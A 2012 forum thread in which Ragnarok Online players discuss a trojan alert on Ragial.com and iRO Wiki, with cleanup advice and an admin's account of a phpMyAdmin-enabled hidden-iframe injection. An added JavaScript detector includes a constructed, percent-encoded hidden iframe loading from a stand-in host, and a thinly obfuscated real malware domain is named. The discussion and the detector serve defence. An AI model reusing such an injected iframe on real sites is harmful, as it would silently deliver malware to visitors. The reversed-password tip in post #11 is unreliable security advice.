Ragial.com - Trojan alert
#1
Posted 23 May 2012 - 09:15 PM
Threat: JS/Iframe.DK trojan
#2
Posted 23 May 2012 - 09:19 PM
It was attempting to modify the MD5 219a8faed9a602aba91f687fff019019, threat ID 4755606. "A known bad file was blocked from opening:
Program:
E4D6Bd01 (Exploit)"
EDIT: Currently I am in the middle of a deep scan, I will let you know if I find anything interesting.
Edited by Superpass, 23 May 2012 - 09:22 PM.
#3
Posted 23 May 2012 - 09:22 PM
#4
Posted 23 May 2012 - 09:24 PM
It's odd.
#5
Posted 23 May 2012 - 09:30 PM
#6
Posted 23 May 2012 - 09:32 PM
#7
Posted 23 May 2012 - 09:33 PM
EDIT:
My antivirus ended up labeling whatever's in the wiki a Blackhole Exploit Kit. Woo.
Edited by Balthi, 23 May 2012 - 09:33 PM.
#8
Posted 23 May 2012 - 09:45 PM
#9
Posted 23 May 2012 - 09:57 PM
I was on Ragial earlier, but only on Chrome, and I didn't get any popup. I have Adblock enabled.
Anyway please do post the results of the scan. And thanks for the heads up.
#10
Posted 23 May 2012 - 09:58 PM
#11
Posted 24 May 2012 - 12:13 AM
Here is a small guide to what I do when my antivirus detects a trojan:
1. Save all needed files which I really don't want to lose and don't have a backup of yet, such as pictures and stuff
2. Format C:/ completely => Delete Windows!
3. Install Windows
4. Install Security Stuff
5. Update Windows & Security Stuff
6. Re-implement all the stuff I need and install games, etc.
7. Deep system scans with all security programs
8. Scandisk & Defrag of C:
9. Another Deep System Scan
BETWEEN STEP 6 & 9 => Change all my passwords to NEW(!!!) passwords which have not been used yet. I think a real-life notepad is OKAY to write PWs down in; you may want to write them down in another system you can recognize, like PASSWORD => DROWSSAP or something, just in case someone breaks into your house, steals your notepad and is an RO player
Remember: HAVING A NOTEPAD WITH PASSWORDS ON YOUR COMPUTER IS AN ABSOLUTELY NO GO!!!!
(Bad programs may check for .txt files on your Desktop or much-used files just to check if such a Password.txt file exists!)
----
In my opinion, if you get a trojan it is always safer to just delete Windows and install it anew, because you never know if there might be something hidden...
Edited by Bascojiin, 24 May 2012 - 12:20 AM.
#12
Posted 24 May 2012 - 12:32 AM
In any case, problem has been identified and is in the process of being fixed. It is clever enough to avoid being activated while you're using Chrome (which is why I didn't figure it out at first), Firefox just spit out an encoding error and IE 404'd and passed a webpage off to MSSE which ate it.
(Moral of the story, don't use IE!)
Feel free to run scans but I don't think it'll go much further than your temp folder. Clear your cache etc.
#13
Posted 24 May 2012 - 12:34 AM
So you got hacked I assume? There's really no need for that sort of panic unless you're running on a 10 year old machine that has never had a security update!
Did any files get compromised, such as the user database of iRO Wiki or iRO Wiki Forums? Just asking because we all know some really smart people use their username/password on every site.
#14
Posted 24 May 2012 - 12:44 AM
Just scan your computer, and if you are feeling a little paranoid change your passwords. And as always, this is a good time to remind you to use different passwords for each site, and don't store them on your computer.
#15
Posted 24 May 2012 - 12:45 AM
#16
Posted 24 May 2012 - 12:47 AM
The trojan seems to only be attached to the iROwiki and Ragial. The game itself shouldn't give you any trouble. It wasn't the game that had any issues. I play it with computer server, but it looks like nothing happened with the firewall and antivirus and anti-hack alert <.< so, not everyone got attacked by that trojan??
#17
Posted 24 May 2012 - 01:07 AM
Modern security software, working as intended, blocked anything from really happening on your side. Firefox simply failed with an encoding error; IE tried to redirect to the bad website and was halted by a combination of protections.
Whoever made the malware was smart enough to bypass Chrome completely so Google couldn't pick up on it! (meaning, if you use Chrome, the bad code never ran)
No user data on the irowiki side was compromised. The only compromise, as I said before, would be if you were running an ancient version of Windows XP with no security software.
http://www.microsoft...Name=JS/Blacole
Long story short, if Windows, Java, and Adobe Reader are up to date, nothing will happen.
Edited by Bluedreams, 24 May 2012 - 01:16 AM.
#18
Posted 24 May 2012 - 01:09 AM
#19
Posted 24 May 2012 - 01:25 AM
I have a notepad... on the laptop I don't connect to the internet =) Time for another forced password change, I assume; if you get a trojan via iRO wiki the trojan will look for your RO passwords.
#20
Posted 24 May 2012 - 01:33 AM
#21
Posted 24 May 2012 - 01:56 AM
#22
Posted 24 May 2012 - 02:22 AM
#23
Posted 24 May 2012 - 02:41 AM
Good night!
#24
Posted 24 May 2012 - 04:09 AM
This is not a new trick, but it is nifty. If you look at the source, the JavaScript at the top of the Ragial page uses document.write to create a 10x10 invisible iframe. It then inserts the created div into the body. The actual src leads to http drjdrdjgyiuu myfw us. (malware infested, so .'s replaced with smiley) Some glitch in an old version of phpMyAdmin that was running on a website I host (think 5+ years old) allowed code to be injected which tried to redirect the initial website request to another website to download malware.
As to why it "bypassed" Chrome, it didn't. It's the other way round. Just take a look at the actual script and where it is placed, and you'll see why it didn't load on WebKit-based browsers.
If you think about this sort of attack, it really isn't effective. Modern antivirus software that scans HTTP streams will recognize the JS code and catch it even before the page loads, and therefore even before it has a chance to insert the iframe (the JS code calls out <body> by id, so it can only run after everything before </body> has been loaded). This probably resulted in Firefox giving out 404's.
Interestingly, with the newest Firefox nightly, sandboxed iframes are introduced, which should annihilate this sort of malicious attack, if web devs choose to implement it.
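The injection described in this post (a tiny invisible iframe emitted through document.write, pointing off-site) is the kind of thing a page scanner can flag from the source alone. The following is an added example written for this thread, not code from the post or from Ragial/iRO Wiki; the function names, the SAMPLE_HTML markup and the hosts in it are constructed for illustration.

```javascript
// Added example: flag <iframe> tags that are tiny, hidden and point off-site, including
// ones that only appear once document.write(...) output is reconstructed.
// SAMPLE_HTML and the hosts in it are constructed; this is not Ragial's real page source.
const SUSPECT_MAX_PX = 10;

// Rebuild what document.write(...) would emit when its argument is built from string
// literals, '+' concatenation and percent-escapes (unescape-style). Strings computed
// at runtime are out of scope for this heuristic.
function documentWriteOutput(html) {
  const out = [];
  const callRe = /document\.write\s*\(([\s\S]*?)\)\s*(?:;|<\/script)/gi;
  for (const call of html.matchAll(callRe)) {
    const literals = [...call[1].matchAll(/(['"])((?:\\.|(?!\1)[^\\])*)\1/g)].map(x => x[2]);
    let text = literals.join('').replace(/\\(['"\/])/g, '$1');
    text = text.replace(/%u([0-9a-f]{4})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
    try { text = decodeURIComponent(text); } catch (e) { /* not percent-encoded; keep as is */ }
    out.push(text);
  }
  return out.join('\n');
}

// Read one attribute value out of a raw tag string (double-, single- or unquoted).
function attr(tag, name) {
  const m = tag.match(new RegExp(`\\s${name}\\s*=\\s*(?:"([^"]*)"|'([^']*)'|([^\\s>]+))`, 'i'));
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

const isTiny = v => v !== null && !Number.isNaN(parseInt(v, 10)) && parseInt(v, 10) <= SUSPECT_MAX_PX;
const isHiddenStyle = s => !!s && /visibility\s*:\s*hidden|display\s*:\s*none/i.test(s);
function isOffsite(src, pageHost) {
  if (!src) return false;
  try { return new URL(src, `http://${pageHost}/`).hostname !== pageHost; } catch (e) { return true; }
}

// Scan the literal markup plus the reconstructed document.write output. An iframe is
// reported when at least two indicators hold, which keeps ordinary same-site widgets out.
function findSuspiciousIframes(html, pageHost) {
  const tags = new Set((html + '\n' + documentWriteOutput(html)).match(/<iframe\b[^>]*>/gi) || []);
  return [...tags].map(tag => {
    const reasons = [];
    if (isTiny(attr(tag, 'width')) || isTiny(attr(tag, 'height'))) reasons.push('tiny');
    if (isHiddenStyle(attr(tag, 'style'))) reasons.push('hidden');
    if (isOffsite(attr(tag, 'src'), pageHost)) reasons.push('offsite');
    return { tag, src: attr(tag, 'src'), reasons };
  }).filter(r => r.reasons.length >= 2);
}

// Constructed sample: one percent-encoded 10x10 hidden off-site iframe, one legitimate widget.
const SAMPLE_HTML = `<html><head><script>document.write(unescape('%3Ciframe src=%22http://bad.example/in.php%22 width=%2210%22 height=%2210%22 style=%22visibility:hidden%22%3E%3C/iframe%3E'));</script></head>
<body><iframe src="/widgets/market.html" width="600" height="400"></iframe></body></html>`;

console.log(findSuspiciousIframes(SAMPLE_HTML, 'ragial.com'));
```

Running it reports only the injected frame with reasons tiny, hidden and offsite; the 600x400 same-site widget is left alone.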
#25
Posted 24 May 2012 - 04:16 AM